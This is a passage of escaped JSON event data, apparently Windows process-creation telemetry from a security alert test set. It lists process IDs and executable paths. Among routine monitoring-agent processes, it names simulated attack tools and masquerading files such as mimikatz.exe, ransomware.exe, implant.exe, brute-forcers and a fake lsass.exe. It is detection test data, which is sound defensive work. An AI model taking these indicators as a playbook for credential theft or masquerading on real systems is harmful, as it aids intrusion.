\",\"0x12dc\",\"0xb8\",\"0x11b4\",\"0x1020\",\"0xd80\",\"0xbdc\",\"0x690\",\"0x6d4\",\"0x54c\",\"0x93c\",\"0x138c\",\"0x1258\",\"0xf94\",\"0x123c\",\"0x11e4\",\"0xa08\",\"0x125c\",\"0x10f4\",\"0x1020\",\"0x638\",\"0x10cc\",\"0x107c\",\"0x1064\",\"0x1220\",\"0x1258\",\"0xab8\",\"0xbd8\",\"0x123c\",\"0xcd8\",\"0xd14\",\"0xa10\",\"0x1298\",\"0xac4\",\"0x364\",\"0x1128\",\"0xc54\",\"0x12e8\",\"0x17fc\",\"0x17f0\",\"0x1434\",\"0x1404\",\"0x13a4\",\"0x10f4\",\"0x11e8\",\"0x364\",\"0xc08\",\"0x338\",\"0xfbc\",\"0x640\",\"0x1320\",\"0x13b0\",\"0x1388\",\"0x11c8\",\"0x544\",\"0x894\",\"0xde8\",\"0x778\",\"0x2f8\",\"0x364\",\"0x1c4\",\"0x99c\",\"0x10c8\",\"0x13e0\",\"0x1550\",\"0x15d0\",\"0x13b4\",\"0x16d0\",\"0x11a8\",\"0x244\",\"0x1050\",\"0x690\",\"0xb8\",\"0x1364\",\"0x1148\",\"0x10e0\",\"0x12fc\",\"0x5cc\",\"0x518\",\"0xf84\",\"0xd64\",\"0xc18\",\"0xb50\",\"0x10a4\",\"0x13b4\",\"0xe3c\",\"0xd64\",\"0xc18\",\"0x10e0\",\"0x108c\",\"0x28c\",\"0x11b4\",\"0xddc\",\"0xbe8\",\"0x130c\",\"0x1040\",\"0x1370\",\"0x8e4\",\"0x10fc\",\"0x1298\",\"0x7f8\",\"0xf94\",\"0xc18\",\"0xa84\",\"0x1348\",\"0xe34\",\"0x11b4\",\"0x13b4\",\"0x1148\",\"0xde8\",\"0xc08\",\"0x1338\",\"0xb8\",\"0x6d4\"],\"NewProcessName\":[\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\42424.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\1234.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\tsetup.1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\perfc.dat\",\"C:\\\\Diagnostics\\\\UserTmp\\\\sdopfjiowtbkjfnbeioruj.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\doubleextension.pdf.exe\",\"C:\\\\Windows\\\\System32\\\\vssadmin.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\dllhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\Dism.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\Temp\\\\CC563BBE-DE32-44D3-8E35-F3FC78E72E40\\\\DismHost.exe\",\"C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe\",\"C:\\\\Windows\\\\WinSxS\\\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.2602_none_7ee6020e2207416d\\\\TiWorker.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\regsvr32.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\suchost.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\certutil.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\whoami.exe\",\"C:\\\\Windows\\\\System32\\\\HOSTNAME.EXE\",\"C:\\\\Windows\\\\System32\\\\NETSTAT.EXE\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\ftp.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\dubrute.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\nlbrute.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\svchost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\smss.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\ASC_Alerttest_662jfi039n.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\wuauclt.exe\",\"C:\\\\Windows\\\\SoftwareDistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\lsass.exe\",\"C:\\\\Windows\\\\SoftwareDistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cacls.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\2840.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\a_keygen.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\bittorrent.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\ransomware.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\pcalua.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\findstr.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\odbcconf.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\odbcconf.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\SQLDumper.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\mt.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\mt.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\hd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\hd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\certutil.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\sc.exe\",\"C:\\\\Windows\\\\System32\\\\sc.exe\",\"C:\\\\Windows\\\\System32\\\\wermgr.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\Fonts\\\\csrss.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\WerFault.exe\",\"C:\\\\Windows\\\\Fonts\\\\conhost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\mimikatz.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Windows\\\\Fonts\\\\conhost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\regsvr32.exe\",\"C:\\\\Windows\\\\System32\\\\tasklist.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\MusNotification.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\MusNotification.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\taskhostw.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service 